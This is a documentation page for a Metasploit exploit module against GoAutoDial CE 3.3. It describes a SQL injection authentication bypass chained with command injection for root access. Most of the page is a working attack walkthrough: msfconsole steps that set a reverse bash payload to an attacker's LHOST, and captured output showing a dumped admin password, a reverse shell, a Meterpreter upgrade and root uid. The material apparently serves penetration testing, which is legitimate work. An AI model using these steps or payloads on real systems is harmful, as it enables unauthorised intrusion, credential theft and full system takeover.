## Description This module exploits a SQL injection flaw and command injection flaw within GoAutoDial CE 3.3, which permits authentication bypass and a complete compromise of the underlying system with root privileges. This module also extracts the administrative users password from the underlying database. ## Affected software GoAutoDial 3.3 CE (32bit and 64bit) is available for download from goautodial.org. In order to download, register a free account then download the bootable ISOs. Both ISOs have been used for the dev of this. http://goautodial.org/attachments/download/3237/goautodial-32bit-ce-3.3-final.iso.html Refer to: https://www.exploit-db.com/exploits/36807/ ## Verification List the steps needed to make sure this thing works - Start `msfconsole` - Do `use exploit/linux/http/goautodial_3_rce_command_injection` - Do `set payload cmd/unix/reverse_bash` - Do `set RHOST ` - Do `set LHOST ` - Do `set LPORT ` - Wait for shell ``` msf exploit(goautodial_3_rce_command_injection) > check [+] 192.168.0.76:443 The target is vulnerable. msf exploit(goautodial_3_rce_command_injection) > exploit -z [*] Started reverse TCP handler on 192.168.0.11:4444 [*] 192.168.0.76:443 - Trying SQL injection... [+] Authentication Bypass (SQLi) was successful [*] 192.168.0.76:443 - Dumping admin password... [+] admin|goautodial|Admin|||Y [*] 192.168.0.76:443 - Sending payload...waiting for connection [*] Command shell session 7 opened (192.168.0.11:4444 -> 192.168.0.76:37338) at 2017-06-18 01:40:41 +1000 [*] Session 7 created in the background. msf exploit(goautodial_3_rce_command_injection) > sessions -u 7 [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [7] [*] Upgrading session ID: 7 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 192.168.0.11:4433 [*] Starting the payload handler... [*] Sending stage (797784 bytes) to 192.168.0.76 [*] Meterpreter session 8 opened (192.168.0.11:4433 -> 192.168.0.76:58124) at 2017-06-18 01:41:04 +1000 [*] Command stager progress: 100.00% (668/668 bytes) msf exploit(goautodial_3_rce_command_injection) > sessions -i 8 [*] Starting interaction with 8... meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > sysinfo Computer : test OS : CentOS 5.10 (Linux 2.6.18-371.11.1.el5) Architecture : x64 Meterpreter : x86/linux ```